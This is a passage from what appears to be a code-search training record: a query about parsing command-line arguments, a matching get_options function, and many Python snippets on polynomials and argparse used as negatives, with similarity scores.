a3, a4, a6]", "def build_poly(x, degree):\n \"\"\"\n Assemble the 3 label vectors with the original ordering \n Inputs:\n - x (ndarray) : binary prediction for set 1\n - degree (int) : binary prediction for set 2 \n Outputs: \n - p (ndarray) : predicted labels for test set ( with the original ordering)\n \"\"\"\n # forming a matrix containing the data points\n terms = np.hstack([np.ones([x.shape[0],1]),np.tile(x,(1,degree))])\n index = np.arange(degree)+1\n \n # forming a matrix contnaining the exponents\n exponents = np.multiply(np.ones((1, x.shape[1])), index[:, np.newaxis])\n exponents = exponents.reshape([1, x.shape[1]*degree])\n exponents = np.multiply(exponents, np.ones([x.shape[0], 1]))\n exponents = np.hstack([np.ones( (x.shape[0], 1) ),exponents])\n \n # using the exponent matrix as the element-wise exponents of the terms in the terms matrix\n p=np.power(terms,exponents)\n return p", "def polynomial(a, x):\n\n sum = 0\n\n for i in range(len(a)):\n sum += a[i] * x**i\n return sum", "def polynomial(degree, coeffs):\n\n def h(x):\n result = 0\n degre=degree\n for i in range(len(coeffs)):\n result = result + coeffs[i]*(x**degre)\n degre = degre - 1\n return result\n \n\n def h(x):\n result = 0\n nonlocal degree\n for i in range(len(coeffs)):\n result = result + coeffs[i]*(x**degree)\n degree = degree - 1\n return result\n\n\n\n\n\n return h\n\n # def h(x):\n # result = 0\n # for i in range(degree, -1, -1):\n # result = result + coeffs[degree - i]*(x**i)\n \n # return result\n \n\n\n # return h", "def poly(x, coeffs):\n return np.sum([coeffs[i] * x ** i for i in range(len(coeffs))], axis=0)", "def _evalPoly(self,a,x):\n y = a[0]\n for i in range(1,len(a)):\n y = self.F.Multiply(y, x)\n y = self.F.Add(y, a[i])\n return y", "def polyval_vec(p, x, prec=None):\n p = np.atleast_2d(p)\n x = np.atleast_1d(x).flatten()\n # for modest to large arrays, faster to find unique values and\n # only evaluate those. Have to cast to float because np.unique\n # can't handle object types like python native int\n unq_x, xidx = np.unique(x, return_inverse=True)\n _, pidx, outidx = np.unique(\n p.astype(float), return_index=True, return_inverse=True, axis=0\n )\n unq_p = p[pidx]\n\n if prec is not None and prec > 18:\n # TODO: possibly multithread this bit\n mpmath.mp.dps = prec\n y = np.array([np.asarray(mpmath.polyval(list(pi), unq_x)) for pi in unq_p])\n else:\n npoly = unq_p.shape[0] # number of polynomials\n order = unq_p.shape[1] # order of polynomials\n nx = len(unq_x) # number of coordinates\n y = np.zeros((npoly, nx))\n\n for k in range(order):\n y = y * unq_x + np.atleast_2d(unq_p[:, k]).T\n\n return y[outidx][:, xidx].astype(float)", "def construct_polynomial_approx(degree, weights):\n # here is a function that is created on the fly from the input feature\n # mapping and weights\n def prediction_function(xs):\n expanded_xs = np.matrix(expand_to_monomials(xs, degree))\n ys = expanded_xs*np.matrix(weights).reshape((len(weights),1))\n return np.array(ys).flatten()\n # we return the function reference (handle) itself. 
This can be used like\n # any other function\n return prediction_function", "def polyFunction(x,weights):\n y=0\n for i in range (0,len(weights)):\n y+= weights[i]*(x**i)\n return y", "def zzx_from_poly(f):\n return zzx_from_dict(dict(zip([ m for (m,) in f.monoms ], f.coeffs)))", "def zzx_to_poly(f, *symbols):\n from sympy.polys import Poly\n\n terms = {}\n\n for monom, coeff in zzx_to_dict(f).iteritems():\n terms[(monom,)] = Integer(int(coeff))\n\n return Poly(terms, *symbols)", "def zzX_from_poly(f):\n if f.is_univariate:\n return zzx_from_poly(f)\n else:\n return zzX_from_dict(dict(zip(f.monoms, f.coeffs)), len(f.symbols))", "def polyfeatures(self, X, degree):\n #TODO\n \n for d in range(2,degree+1):\n X = np.append(X,X[:,[0]]**d,1)\n \n return X", "def main():\r\n\r\n coef = [1,0,0,-1,-10]\r\n x = 2\r\n\r\n # The algorithm initializes result as coefficient of x^n, where n is the degree of polynomial and then\r\n # Repeatedly multiply result with x and add next coefficient to result\r\n result = coef[0]\r\n for i in range(1, len(coef)):\r\n result = (result * x) + coef[i]\r\n\r\n print(f'The function evaluate to : {result} for given x value: {x}')", "def polyval(p, x):\r\n val = 0\r\n ii = len(p) - 1\r\n for i in range(len(p) - 1):\r\n val += p[i] * (x ** ii)\r\n ii -= 1\r\n return val + p[-1]", "def _factor_univariate_polynomial(self, f):\n R = f.parent()\n\n # if the polynomial does not have complex coefficients, PARI will\n # factor it over the reals. To make sure it has complex coefficients we\n # multiply with I.\n I = R.base_ring().gen()\n g = f*I if f.leading_coefficient()!=I else f\n\n F = list(g._pari_with_name().factor())\n\n from sage.structure.factorization import Factorization\n return Factorization([(R(g).monic(),e) for g,e in zip(*F)], f.leading_coefficient())", "def definePolyFunction():\n lstWeights=[]\n degree = input(\"degree of polynomial in terms of highest exponent of x:\")\n degree = int(degree+1)\n for a in range (0,degree):\n string='weight for x^'+str(a)+':'\n weight = input(string)\n weight = float(weight)\n lstWeights.append(weight)\n return lstWeights", "def linear_polynomial(self, e: 'PFElement') -> Polynomial:\n poly = self.polynomial(-e)\n poly += poly.monic(1)\n return poly", "def polyFeat(X, p):\r\n # You need to return the following variables correctly.\r\n X_poly = np.zeros((X.shape[0], p))\r\n\r\n # ====================== YOUR CODE HERE ======================\r\n\r\n for i in range(p):\r\n X_poly[:, i] = X[:, 0] ** (i + 1)\r\n\r\n # ============================================================\r\n return X_poly", "def polynomial_basis(X, degree):\n n_samples, n_features = X.shape\n\n # The number of monomials is (n + d) choose d\n n_monomials = int(factorial(n_features + degree)/(factorial(n_features)*factorial(degree)))\n features = np.ones((n_monomials, n_samples))\n col = 1\n x_T = X.T\n\n for deg in range(1, degree + 1):\n for combs in combinations_with_replacement(x_T, deg):\n features[col, :] = reduce(lambda x, y: x * y, combs)\n col += 1\n return features.T", "def generate_polynomial():\n degree = numpy.random.choice(range(3, 7))\n x = numpy.linspace(-10, 10, 1000)\n coefficients = numpy.random.chisquare(3, size=degree) + 1\n coefficients *= numpy.random.choice([-1, 1], size=coefficients.shape)\n coefficients *= 0.5\n y = numpy.polyval(coefficients, x)\n add_noise(y, 0.1)\n return x, y", "def funcv(x):\n f0 = x[0] ** 3.0 + x[1] + 3.0\n f1 = x[1] - 4.0 * x[0]\n return f0, f1", "def polynomial_value(multipliers, variable):\n def term(mult, var, 
order):\n if order > 1:\n return mult * variable ** order\n elif order == 1:\n return mult * variable\n elif order == 0:\n return mult\n return sum([term(mult, variable, order) for order, mult in enumerate(multipliers)])", "def build_poly(x, degree):\n \n X = np.vander((x[:,0]).T, degree+1, increasing=True)\n \n for i in range(1,np.shape(x)[1],1):\n feat = (x[:,i]).T\n vander = np.vander(feat, degree+1, increasing=True)\n #remove the column of 1 at the beginning of each vander\n vander = np.delete(vander, 0,axis = 1)\n #concatenation\n X = np.concatenate((X, vander), axis=1)\n \n return X", "def _create_ploynomial_array(self, coeff, x):\n xarr = numpy.array(x)\n yarr = numpy.zeros(len(xarr))\n for idim in range(len(coeff)):\n ai = coeff[idim]\n yarr += ai*xarr**idim\n return yarr", "def f(self, x, coeffs, jitter = 0):\n return np.polyval(np.flip(coeffs), x) + random.uniform(-jitter,jitter)", "def construct_poly(data, power):\n return np.power(data, power)", "def evaluate_poly(poly, x):\n value_of_poly = 0\n for i in range(0, len(poly)):\n var = x\n power = i\n coeff = poly[i]\n value_of_poly += (coeff * (var**power))\n return value_of_poly", "def generate_polynomial_features(self, X) :\n\n n,d = X.shape\n\n ### ========== TODO : START ========== ###\n # part b: modify to create matrix for simple linear model\n # part g: modify to create matrix for polynomial model\n Phi = X\n m = self.m_\n\n if m == 1:\n Phi = np.zeros((n,2))\n for i in range(n):\n Phi[i,0] = 1\n Phi[i, 1] = X[i]\n\n else:\n Phi = np.ones((n,m+1))#n*m+1 dimmension\n power_arr = np.arange(0, m+1)\n for index, row in enumerate(Phi):# get every row\n row = np.repeat(X[index],m+1)\n row = np.power(row,power_arr)\n Phi [index,] = row\n #also could use the following\n \"\"\"\n import sklearn.preprocessing as sk\n #X is a N*1 vector\n poly_mat = sk.PolynomialFeatures(3)\n poly.fit_transform(a)\n \"\"\"\n\n\n\n\n\n ### ========== TODO : END ========== ###\n\n return Phi", "def polynomial(self, *args, indeterminate: str = 'X') -> Polynomial:\n return Polynomial([self.element(c) for c in args], base_field=self, indeterminate=indeterminate)", "def get_poly(kwargs):\n from sklearn.preprocessing import PolynomialFeatures\n return PolynomialFeatures(**kwargs)", "def general_poly(L):\n def evaluate(x):\n length=len(L)-1\n value=0\n for i in L:\n value+=i*(x**length)\n length-=1\n return value\n return evaluate", "def fourth_poly(a, b, c, d, e):\n return lambda z: a*z**4 + b*z**3 + c*z**2 + d*z + e", "def get_polyfit_function(self):\n N = len(self.coefficients)\n return lambda x: np.dot( self.get_poly(x).T , self.coefficients.reshape(N, 1) )", "def vectorMultiply(v, f):\n return [x * f for x in v]", "def coeffients(x, y):\n\n # ensure floating point datatypes\n x.astype(float)\n y.astype(float)\n\n # degree of interpolating polynomial\n n = len(x)\n\n # intitilize list of coeffients for interpolating polynomial to y values\n c = y.tolist()\n\n # compute coeffients\n for j in range(1, n):\n for i in range(n-1, j-1, -1):\n c[i] = float(c[i]-c[i-1])/float(x[i]-x[i-j])\n\n # return an array of polynomial coefficient, note: reverse order for np.polyval function\n return np.array(c[::-1])", "def prism_polynomial_set_vector(\n domain_dim: int, range_dim: int, order: int, variables: AxisVariablesNotSingle = x\n) -> typing.List[VectorFunction]:\n set1d = prism_polynomial_set_1d(domain_dim, order, variables)\n return [\n VectorFunction([p if i == j else 0 for j in range(range_dim)])\n for p in set1d\n for i in range(range_dim)\n ]", "def 
polynomial(x, y):\n \n var = copy(x)\n known = copy(y)\n V = vandermonde_matrix(var)\n a = gauss_elimination(V, known)\n return a", "def add_polynomial_features(x, power):\n if type(power) is int and type(x) is np.ndarray:\n return np.concatenate([x**i for i in range(1, power+1)], axis=1)\n return None", "def list_to_poly(polynomial_list):\n max_degree = len(polynomial_list) - 1\n strings = []\n opts = ['x', '']\n for index, num in enumerate(polynomial_list):\n if num == 0:\n continue\n if index < max_degree - 1:\n string = '{}x^{}'.format(num, max_degree - index)\n strings.append(string)\n else:\n strings.append(str(num) + opts[index - (max_degree - 1)])\n polynomial = ' + '.join(strings).replace('+ -', '- ')\n return polynomial", "def bezierPoly(ctrlP):\n n = len(ctrlP) - 1 #degree of the polynomial\n first = True\n for t in np.linspace(0.0, 1.0, 5 * n):\n point = bezierFunc(ctrlP, t)\n if first: # Initialize list of points in the polynomial\n bezierPointsList = np.copy(point)\n first = False\n else:\n bezierPointsList = np.append(bezierPointsList, point, axis=0)\n return bezierPointsList", "def f(self, x=None, odo=None, v=None):\n \n # x is a vector\n x = base.getvector(x, 3)\n dd, dth = odo\n theta = x[2]\n\n if v is not None:\n v = base.getvector(v, 2)\n dd += v[0]\n dth += v[1]\n \n x_next = x + [dd * np.cos(theta), dd * np.sin(theta), np.ones(np.size(x, 0)*dth)]\n\n return x_next", "def F(cst, x):\n [u0, v0, u1, v1, u2, v2, coeffs] = cst\n [u, v, g1, g2, g3] = x\n a = g1*u1 - u0\n b = g2*u2 - u0\n c = g3*u - u0\n l = g1*v1 - v0 \n m = g2*v2 - v0\n n = g3*v - v0\n r = g1 - 1\n s = g2 - 1\n t = g3 - 1\n return np.array([\n coeffs[0]*(a**2-l**2) + 2*coeffs[1]*(a*b-l*m) + coeffs[2]*(b**2-m**2) + 2*coeffs[3]*(a*c-l*n) + 2*coeffs[4]*(b*c-m*n) + c**2 - n**2,\n coeffs[0]*(l**2-r**2) + 2*coeffs[1]*(l*m-r*s) + coeffs[2]*(m**2-s**2) + 2*coeffs[3]*(l*n-r*t) + 2*coeffs[4]*(m*n-s*t) + n**2 - t**2,\n coeffs[0]*a*l + coeffs[1]*(l*b+m*a) + coeffs[2]*m*b + coeffs[3]*(l*c+n*a) + coeffs[4]*(m*c+b*n) + c*n,\n coeffs[0]*a*r + coeffs[1]*(r*b+s*a) + coeffs[2]*s*b + coeffs[3]*(r*c+t*a) + coeffs[4]*(s*c+b*t) + c*t,\n coeffs[0]*r*l + coeffs[1]*(l*s+m*r) + coeffs[2]*m*s + coeffs[3]*(l*t+n*r) + coeffs[4]*(m*t+s*n) + t*n \n ])", "def build_poly(tx, degree) :\n shape = tx.shape\n poly = np.zeros((shape[0], shape[1] * degree))\n poly[:,:shape[1]] = tx\n for deg in range(2, degree + 1) :\n for j in range(0, shape[1]) :\n poly[:, shape[1] * (deg - 1) + j] = tx[:,j] ** deg\n return poly", "def nc_coeffs(poly, var, max_deg=10, order='increasing'):\r\n\r\n # TODO: elegant way to find out the degree\r\n # workarround: pass the maximum expected degree as kwarg\r\n\r\n D0 = sp.Dummy('D0')\r\n poly = poly.expand() + D0 # ensure class add\r\n\r\n assert isinstance(poly, sp.Add)\r\n res = []\r\n # special case: 0-th power of var\r\n coeff = 0\r\n for a in poly.args:\r\n if not a.has(var):\r\n coeff += a\r\n res.append(coeff.subs(D0, 0))\r\n\r\n # special case: first power of var\r\n coeff = poly.diff(var).subs(var, 0)\r\n res.append(coeff)\r\n\r\n # powers > 1:\r\n for i in xrange(1, max_deg):\r\n coeff = 0\r\n for a in poly.args:\r\n if a.has(var**(i + 1)):\r\n term = a.subs(var, 1)\r\n coeff += term\r\n res.append(coeff)\r\n\r\n if order == \"decreasing\":\r\n res.reverse()\r\n\r\n return res", "def generate_random_tropical_poly(max_degree, min_coefficient, max_coefficient):\n coefficients = []\n for d in range(0, random.randint(1, max_degree) + 1):\n coefficients.append(random.randint(min_coefficient, max_coefficient))\n 
return coefficients", "def phi_poly(self,x,i):\n return x**i", "def general_poly (L):\r\n\r\n def secondFunc(x):\r\n total = 0\r\n listLength = len(L)-1\r\n for i in L:\r\n total += i * x**listLength\r\n listLength -= 1\r\n return(total)\r\n return secondFunc", "def polynomial_equation(funct):\n coeff = str(differentiation.parse_coefficient(funct))\n if \"^\" not in funct:\n divisor = \"1\"\n else:\n divisor_location = str(funct.index(\"^\") + 1)\n divisor = funct[divisor_location:]\n if divisor == \"-1\":\n pass\n else:\n divisor = str(int(divisor) + 1)\n coeff += \"/\" + divisor\n return coeff + \"x^\" + str(divisor)", "def coeffs(f):\n return dmp_coeffs(f.rep, f.lev, f.dom)", "def generador_n(vector_v, constante):\n\n n = []\n\n for x in range(len(vector_v)):\n nn = vector_v[x] * constante\n n.append(nn)\n\n # print(\"valores v: \", vector_v)\n # print(\"valores n: \", n)\n\n return n", "def polyder_vec(p, m):\n factorial = np.math.factorial\n m = np.asarray(m, dtype=int) # order of derivative\n p = np.atleast_2d(p)\n order = p.shape[1] - 1\n\n D = np.arange(order, -1, -1)\n num = np.array([factorial(i) for i in D], dtype=object)\n den = np.array([factorial(max(i - m, 0)) for i in D], dtype=object)\n D = (num // den).astype(p.dtype)\n\n p = np.roll(D * p, m, axis=1)\n idx = np.arange(p.shape[1])\n p = np.where(idx < m, 0, p)\n\n return p", "def evaluate_poly(poly, x):\n if len(poly) == 1:\n\t\t#base case\n\t\treturn poly[0]\n else:\n #recursive case\n #the first item in the tuple is the coefficient of X**0, so it's the final value\n #the rest of the items in the tuple need multiplied by X and put in new tuple\n #Yes, I'm cheating and casting a list to a tuple. GFY and your immutability.\n return poly[0] + evaluate_poly(tuple([x * coeff for coeff in poly[1:]]), x)", "def evaluate_poly(poly: Sequence[float], x: float) -> float:\n return sum(c * (x**i) for i, c in enumerate(poly))", "def as_vector(self):\n if self.is_vector():\n return self\n else:\n assert self.is_scalar()\n return BSplineFunc(self.kvs, self.coeffs[..., np.newaxis])", "def hash_vector(self,v):\r\n # you will need to use self.functions for this method\r\n x = np.array([f(v[0]) for f in self.functions])\r\n #print (x)\r\n return x\r\n raise NotImplementedError", "def phasepoly14(param, x):\n # 2011-09-26 10:42 IJMC: Created from phaselamb14\n N = len(param) - 14\n cparam = array(param[N::], copy=True)\n cparam[0] = 1. / prod(1. + cparam[1::]) - 1.\n\n if len(x.shape)==1:\n was1d = True\n x = x.reshape(14, len(x)/14.)\n else:\n was1d = False\n\n ret = polyval(param[0:N], x)\n ret *= (1. 
+ cparam.reshape(14,1))\n\n if was1d:\n ret = ret.ravel()\n\n return ret", "def get_poly(self, n, xf = 14, y0=[1, 0], first_step = 1e-10, max_step = .1):\n self.n = n\n y0s = [1- first_step**2/2, - first_step]\n sol = integ.solve_ivp(lambda t, y: self.f(t, y, n), (first_step, xf), y0s, max_step=max_step, \\\n vectorized=True, events=self.find_zero)\n data_sol = np.array([sol.t, sol.y[0], sol.y[1]])\n data_sol[1, -1] = 1e-18\n data0 = np.array([0, y0[0], y0[1]]).reshape(3, 1)\n self.poly = np.concatenate((data0, data_sol), axis=1)", "def compute_deriv(poly):\n derivative_of_poly = []\n for i in range(1, len(poly)):\n power = i\n coeff = poly[i]\n y = float(coeff * power)\n first = derivative_of_poly.append(y)\n return derivative_of_poly", "def element_from_poly(self, f):\n n, k = self.n, f.degree()\n if k >= n:\n f = f % self.T\n if f == 0:\n return self.zero()\n d, c = dup_clear_denoms(f.rep.rep, QQ, convert=True)\n c = list(reversed(c))\n ell = len(c)\n z = [ZZ(0)] * (n - ell)\n col = to_col(c + z)\n return self(col, denom=d)", "def slip_to_coefficients(x, y, a):\n partials = np.zeros((x.size, 3))\n partials[:, 0] = (x / a) * (9 * (x / a) / 8 - 3 / 4)\n partials[:, 1] = (1 - 3 * (x / a) / 2) * (1 + 3 * (x / a) / 2)\n partials[:, 2] = (x / a) * (9 * (x / a) / 8 + 3 / 4)\n coefficients = np.linalg.inv(partials) @ y\n return coefficients", "def zzx_eval(f, x):\n result = INT_ZERO\n\n if not x:\n return poly_TC(f)\n\n for a in f:\n result *= x\n result += a\n\n return result", "def poly_derivative(poly):\n if type(poly) is not list or len(poly) < 1:\n return None\n if len(poly) == 1:\n return [0]\n\n derivated_coefficients = []\n\n for power, coefficient in enumerate(poly):\n if power == 0:\n pass\n\n else:\n new_coefficient = coefficient * power\n derivated_coefficients.append(new_coefficient)\n\n return(derivated_coefficients)", "def poly(x, y, pd) :\n # Maximum polynomial degree allowed is 7.\n maxD = 7\n if pd > maxD :\n exit(\"Please choose a reasonable polynomial degree (0 <= pd <= \" + maxD + \").\")\n \n # Make the polynomial matrix one degree at a time.\n p = np.zeros((len(x), int((pd+1)*(pd+2)/2)), float)\n count = 0\n numP = 0\n for i in range(pd + 1) :\n for j in range(numP + 1) :\n if (j == 0) and (numP == 0) :\n p[:,count] = 1\n elif (j == 0) :\n p[:,count] = x**(numP-j)\n elif (numP-j == 0) :\n p[:,count] = y**j\n else :\n p[:,count] = x**(numP-j) * y**j\n count += 1\n numP += 1\n \n return p", "def f(x):\n return ((x[0] - 1) ** 2) + ((x[1] + 3) ** 2)", "def make_coefficients(r, a, num_terms):\n\n\tnum_vars = 4\n\tcoeffs = np.zeros((num_vars, num_terms))\n\tfor i in range(num_vars):\n\t\tcoeffs[i, i+1] = r[i]\n\tcoeffs[0, [5, 6, 7, 8]] = a[0]\n\tcoeffs[1, [6, 9, 10, 11]] = a[1]\n\tcoeffs[2, [7, 10, 12, 13]] = a[2]\n\tcoeffs[3, [8, 11, 13, 14]] = a[3]\n\t\n\treturn coeffs.ravel()", "def viete(f, roots=None, *gens, **args):\n allowed_flags(args, [])\n\n if isinstance(roots, Basic):\n gens, roots = (roots,) + gens, None\n\n try:\n f, opt = poly_from_expr(f, *gens, **args)\n except PolificationFailed as exc:\n raise ComputationFailed('viete', 1, exc)\n\n if f.is_multivariate:\n raise MultivariatePolynomialError(\n \"multivariate polynomials are not allowed\")\n\n n = f.degree()\n\n if n < 1:\n raise ValueError(\n \"Cannot derive Viete's formulas for a constant polynomial\")\n\n if roots is None:\n roots = numbered_symbols('r', start=1)\n\n roots = take(roots, n)\n\n if n != len(roots):\n raise ValueError(\"required %s roots, got %s\" % (n, len(roots)))\n\n lc, coeffs = f.LC(), 
f.all_coeffs()\n result, sign = [], -1\n\n for i, coeff in enumerate(coeffs[1:]):\n poly = symmetric_poly(i + 1, roots)\n coeff = sign*(coeff/lc)\n result.append((poly, coeff))\n sign = -sign\n\n return result", "def coeffs_from_vec(self, coeffs_vec):\n coeffs = [self.coeffs[0].copy(), self.coeffs[1].copy()]\n coeffs[0].iloc[1:] = coeffs_vec[:self.index_ncoeffs[0]].copy()\n coeffs[1].iloc[1:] = coeffs_vec[self.index_ncoeffs[0]:].copy()\n return coeffs", "def generador_v(vector_n, constante):\n\n v = []\n\n for x in range(len(vector_n)):\n nv = vector_n[x] // constante # // = Division entera\n v.append(nv)\n\n # print(\"valores n: \", vector_n)\n # print(\"valores v: \", v)\n\n return v", "def get_poly_coeff(self, independent, dependent):\n\n try:\n x = self.df_input[[independent]]\n y = self.df_input[[dependent]]\n\n poly = PolynomialFeatures(degree = 2)\n x_poly = poly.fit_transform(x) \n\n model = LinearRegression()\n model.fit(x_poly, y)\n return model.coef_\n except Exception as e:\n print(e)", "def poly_derivative(poly):\n if not poly or type(poly) is not list:\n return None\n\n response = []\n\n for order in range(1, len(poly)):\n response.append(order * poly[order])\n\n if not response:\n response.append(0)\n\n return response", "def cheb_poly(x, n):\n if n == 0:\n return anp.array([1 for i in x])\n elif n == 1:\n return x\n else:\n return 2*x*cheb_poly(x, n-1)-cheb_poly(x, n-2)\n\n raise NotImplementedError(\"Problem 6 Incomplete\")", "def int_to_vector(a: int, characteristic: int, degree: int) -> np.ndarray:\n a_vec = np.zeros(degree, dtype=DTYPE)\n for i in range(degree - 1, -1, -1):\n q, r = divmod(a, characteristic)\n a_vec[i] = r\n a = q\n\n return a_vec", "def prism_polynomial_set_1d(\n dim: int, order: int, variables: AxisVariablesNotSingle = x\n) -> typing.List[ScalarFunction]:\n assert dim == 3\n return [\n ScalarFunction(variables[0] ** i * variables[1] ** j * variables[2] ** k)\n for k in range(order + 1)\n for j in range(order + 1)\n for i in range(order + 1 - j)\n ]", "def get_poly(self, p, vv_x, vv_y, vv_z):\n self._get_poly(p, vv_x, vv_y, vv_z)", "def EllipticCurve_from_Weierstrass_polynomial(f):\n return EllipticCurve(coefficients_from_Weierstrass_polynomial(f))", "def _polynomial_entity(value, context):\n assert isinstance(value, Polynomial)\n coefficients = np.asarray(value.coefficients)\n num_variables = coefficients.ndim\n variables = [sympy.Symbol(context.pop()) for _ in range(num_variables)]\n function_symbol = context.pop()\n handle = FunctionHandle(function_symbol)\n handle_description = sympy.Function(function_symbol)(*variables)\n\n polynomial = polynomials.coefficients_to_polynomial(coefficients, variables)\n polynomial = polynomial.sympy()\n\n return Entity(\n context=context,\n value=value,\n expression=polynomial,\n polynomial_variables=variables,\n description='Let {function} = {polynomial}.',\n handle=handle,\n function=handle_description,\n polynomial=polynomial)", "def E_polynomial(self):\n\n from nodepy import stability_function\n p, q = self.stability_function()\n return stability_function.E_polynomial(p, q)", "def rotorconversion(x):\n return cf.MultiVector(layout, val_rotorconversion(x))", "def evaluate_poly(poly, x):\n exp = 0\n total = 0\n for coef in poly:\n total += coef * (x ** exp)\n exp += 1\n\n return total", "def random_polynomial(self, degree: int) -> Polynomial:\n p = self.polynomial(*[self.random_element() for _ in range(0, degree)])\n p += p.monic(degree)\n return p", "def _generate_poly_array(self, nchan, coeff=[]):\n if nchan < 
0:\n raise ValueError, \"nchan should be >=0\"\n if len(coeff)==0:\n if nchan ==0: return []\n else: raise ValueError, \"No valid coefficient given.\"\n polyarr = numpy.zeros(nchan)\n for iorder in range(len(coeff)):\n polyarr += coeff[iorder]*numpy.array(xrange(nchan))**iorder\n return polyarr", "def polyfit(data, tvec, intfun):\n\n posx = intfun(tvec, data[:, 0])\n posz = intfun(tvec, data[:, 1])\n velx = posx.derivative(1)\n velz = posz.derivative(1)\n accx = posx.derivative(2)\n accz = posz.derivative(2)\n\n pos = np.c_[posx(tvec), posz(tvec)]\n vel = np.c_[velx(tvec), velz(tvec)]\n acc = np.c_[accx(tvec), accz(tvec)]\n\n return pos, vel, acc", "def build_poly_by_feature(tx, degrees):\n poly_tempt = np.ones([tx.shape[0],1])\n for idx, degree in enumerate(degrees):\n feature_poly = build_poly(tx[:,idx], int(degree))\n poly_tempt = np.c_[poly_tempt, feature_poly[:,1:]]\n return poly_tempt", "def base_polynome(numbers):\n\n monomes = [ x**n for n in numbers ]\n polynome = sum(monomes)\n\n return poly(polynome, x)", "def apply_function_vector(function_vector, x_vector):\n function_index = 0\n element_index = 1\n \n def d():\n for e in zip(function_vector, x_vector):\n print(e[1])\n d()\n \n return list(map(lambda fx_set: fx_set[function_index](fx_set[element_index]), zip(function_vector, x_vector)))" ]
[ "0.71002614", "0.6959504", "0.6857088", "0.6731912", "0.671709", "0.66995835", "0.6682442", "0.6642471", "0.66166174", "0.6615598", "0.6501584", "0.6486129", "0.6437595", "0.64153004", "0.64109534", "0.6395708", "0.63793916", "0.636425", "0.63570154", "0.6323563", "0.63210785", "0.6311876", "0.62695116", "0.62600124", "0.625725", "0.62468284", "0.6241553", "0.62346077", "0.62305295", "0.6224792", "0.6201502", "0.62011755", "0.61995184", "0.61757153", "0.6160057", "0.6152254", "0.61279935", "0.61177516", "0.61074066", "0.61055243", "0.60866016", "0.60704637", "0.60691667", "0.6064752", "0.6062994", "0.6048836", "0.6016137", "0.5994943", "0.59916896", "0.59246814", "0.59179455", "0.59060675", "0.58883846", "0.5885904", "0.587994", "0.58799183", "0.58636135", "0.58537495", "0.58468664", "0.5840514", "0.5828928", "0.5821135", "0.58138096", "0.5807103", "0.5799996", "0.5792696", "0.5787576", "0.5781467", "0.5778742", "0.5772484", "0.5767443", "0.57583106", "0.57442546", "0.57390463", "0.5732795", "0.5719657", "0.571687", "0.57142866", "0.57142246", "0.5699291", "0.569207", "0.5683912", "0.5680507", "0.5674287", "0.56733024", "0.56536144", "0.5651479", "0.5642676", "0.56388575", "0.5634643", "0.5606243", "0.5605226", "0.55995053", "0.5590287", "0.55855006", "0.55814964", "0.5576966", "0.5572464", "0.555653", "0.5530422" ]
0.67569125
3
Parse command line arguments
def get_options(cmd_args=None): cmd_parser = argparse.ArgumentParser( formatter_class=argparse.ArgumentDefaultsHelpFormatter) cmd_parser.add_argument( '-i', '--input_file', help="""a log file to be cleaned up""", type=str, default='') cmd_parser.add_argument( '-s', '--salt', help="""the salt for anonymizing IPs [optional, defaults to hardcoded one]""", type=str, default=salt) args = cmd_parser.parse_args(cmd_args) options = {} options['input_file'] = args.input_file options['salt'] = args.salt return options
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def parse_arguments(args):", "def parse_args():\n parser = argparse.ArgumentParser(\n description=\"Reads datapacket pcds, interpolates quaternions and generates scans from dataset in config file\")\n parser.add_argument(\"--visualization\", \"-v\", action=\"store_true\", help=\"if generated clouds should be visualized\")\n parser.add_argument(\"--directory\", \"-d\",\n help=\"if only specified directory should be interpolated, e.g. 'fragments/fragment0'\")\n args = parser.parse_args()\n return args.visualization, args.directory", "def parseArguments(self):\n iterator = iter(sys.argv[1:]) # Skip file name\n for argument in iterator:\n if len(argument) < 2 or argument[:2] != '--':\n self.error('syntax error \"{}\"'.format(argument))\n else:\n def getValueOfArgument(): return next(iterator)\n self.parseArgument(argument[2:], getValueOfArgument)", "def parse_command_line_arguments(argv):\n print(\"reading command line arguments in...\")\n\n parser = argparse.ArgumentParser(description='Description of your program')\n parser.add_argument('-i', '--input', help='Location of input csv file', required=True)\n parser.add_argument('-p', '--predicting', help='The column name containing the category to predict', required=True)\n parser.add_argument('-s', '--scoring', help='The scoring type to be used with model evaluation', required=False)\n parser.add_argument('-c', '--scale', help='List of column names to scale values for', nargs='+', required=False)\n args = parser.parse_args()\n\n return args.input, args.predicting, args.scoring, args.scale", "def parse_command_line(self, argv):\n from optparse import OptionParser\n usage = \"usage: %prog [options]\"\n parser = OptionParser(usage)\n\n (options, args) = parser.parse_args(argv)", "def parse_args():\n parser = argparse.ArgumentParser(description=\"Bandits algorithms on a click-through \"\n \"rate dataset.\")\n parser.add_argument('--plot', action='store_true')\n return parser.parse_args()", "def __parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', '--force', action=\"store_true\", default=False,\n help='overwrite existing database files during import')\n parser.add_argument('-e', '--extension', action=\"store\", default='txt',\n help='specify file extension. default is \"txt\"')\n parser.add_argument('-d', '--delimiter', action=\"store\", default='\\t',\n help='specify column delimiter. default is tab (\\\\t)')\n parser.add_argument('-m', '--mark', action=\"store\", default='.',\n help='specify decimal mark for numeric data. default is'\n ' dot (.)')\n parser.add_argument('-o', '--outformat', action=\"store\", default='npz',\n help='specify output database format. default is \"npz\"'\n ' for numpy database. 
use \"mat\" for matlab '\n ' database format.')\n parser.add_argument('-r', '--recursive', action=\"store_true\", default=False,\n help='recursively walk through all sub-directories of'\n ' current working directory')\n parser.add_argument('-p', '--pcs', action=\"store_true\", default=True,\n help='indicate if files are pcs files.')\n parser.add_argument('-c', '--colheadlines', action=\"store\", default='1',\n help='number of lines spanned by the column headers')\n args = parser.parse_args()\n return args", "def _parse_command_line_arguments():\n parser = ArgumentParser(\n description=(\n 'Command-line tool to generate a list of unique from a TS file from FermiFAST'\n ),\n )\n parser.add_argument(\n 'ts-file',\n type=str,\n help=(\n 'A file containing the TS sky map'\n ),\n )\n parser.add_argument('--skiprows',\n type=int,\n help='number of rows to skip at the top (default 0)',\n required=False)\n parser.set_defaults(skiprows=0)\n arguments = vars(parser.parse_args())\n return arguments", "def parse_command_line_arguments():\n\n description, epilog = __doc__.split(\"\\n\\n\", 1)\n\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=description,\n epilog=epilog)\n\n parser.add_argument('-s', '--s', dest='s', action='store', type=float, required=True,\n help='Minimum frequency')\n parser.add_argument('-c', '--credentials', dest='credentials', action='store',\n default=\"./.tpass\",\n help='File with Twitter credentials (username and password, separated by a space)')\n\n args = parser.parse_args()\n \n return 